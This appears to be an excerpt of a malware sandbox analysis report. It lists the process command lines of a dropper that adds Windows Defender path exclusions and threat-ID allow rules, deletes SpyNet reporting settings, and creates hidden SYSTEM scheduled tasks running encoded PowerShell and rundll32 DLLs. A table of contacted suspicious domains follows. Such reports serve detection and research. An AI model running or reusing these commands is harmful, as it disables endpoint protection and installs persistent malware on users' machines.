C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 3996 -ip 3996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 3996 -ip 3996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 456

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe bt /site_id 757674 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OdCkbftzuRPDCLooswR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OdCkbftzuRPDCLooswR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WyuevociGfNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WyuevociGfNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XxxUzwYQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XxxUzwYQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\unWhUoTpcLxwC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\unWhUoTpcLxwC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FZMYpcBymcbXiuVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FZMYpcBymcbXiuVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FZMYpcBymcbXiuVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FZMYpcBymcbXiuVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HsdHtTcNAoJBjrVs /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HsdHtTcNAoJBjrVs /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gnMtnfgYj" /SC once /ST 02:48:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gnMtnfgYj"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gnMtnfgYj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YESfVrKgbFKcjSeIN" /SC once /ST 15:23:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe\" qz /site_id 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YESfVrKgbFKcjSeIN"

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe qz /site_id 757674 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bGAvhKhnIPTNQeobsw"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XxxUzwYQU\zfRebA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "iwOiVBtjWoVYUMW" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "iwOiVBtjWoVYUMW2" /F /xml "C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "iwOiVBtjWoVYUMW"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "iwOiVBtjWoVYUMW"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "inkTbLvZLQETKy" /F /xml "C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "OyBqrIWqLdeiE2" /F /xml "C:\ProgramData\FZMYpcBymcbXiuVB\WUpZOtb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PlZzFkPIrCHUSjSZK2" /F /xml "C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qLTAOMlkEgsXQBsYXgt2" /F /xml "C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YQwpFizkoQMsJvRhq" /SC once /ST 04:38:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll\",#1 /site_id 757674" /V1 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 880 -p 1800 -ip 1800

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YQwpFizkoQMsJvRhq"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2508

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll",#1 /site_id 757674

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll",#1 /site_id 757674

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 872 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2196

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YQwpFizkoQMsJvRhq"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 1800 -ip 1800

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2224

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YESfVrKgbFKcjSeIN"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 140

Network

Country Destination Domain Proto
N/A 13.89.178.27:443 tcp
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 setupservice.xyz udp
N/A 188.114.97.0:443 setupservice.xyz tcp
N/A 104.80.225.205:443 tcp
N/A 8.249.91.254:80 tcp
N/A 8.249.91.254:80 tcp
N/A 8.249.91.254:80 tcp
N/A 93.184.221.240:80 tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 superload.info udp
N/A 91.202.5.58:80 superload.info tcp
N/A 8.8.8.8:53 static-surf.site udp
N/A 104.21.10.204:80 static-surf.site tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 my-usa.info udp
N/A 91.202.5.58:80 my-usa.info tcp
N/A 8.8.8.8:53 iplogger.com udp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 95.163.241.63:80 95.163.241.63 tcp
N/A 8.8.8.8:53 ilonamaska.info udp
N/A 91.202.5.58:80 ilonamaska.info tcp
N/A 85.208.136.33:80 85.208.136.33 tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 n63b16.info udp
N/A 46.23.109.153:81 n63b16.info tcp
N/A 8.8.8.8:53 downwingbuttons.site udp
N/A 185.117.88.231:80 downwingbuttons.site tcp
N/A 85.208.136.148:80 85.208.136.148 tcp
N/A 8.8.8.8:53 staticcontentfiles.info udp
N/A 185.117.88.231:57120 staticcontentfiles.info tcp
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 185.117.88.231:57120 staticcontentfiles.info tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 224.0.0.251:5353 udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 z0dfnakw4qndvgzp3frm4oa5unhcka.lqbriyvuu2wylnkx4 udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 88.119.175.57:80 tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 service-domain.xyz udp
N/A 3.80.150.121:443 service-domain.xyz tcp
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 172.67.187.207:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 api5.check-data.xyz udp
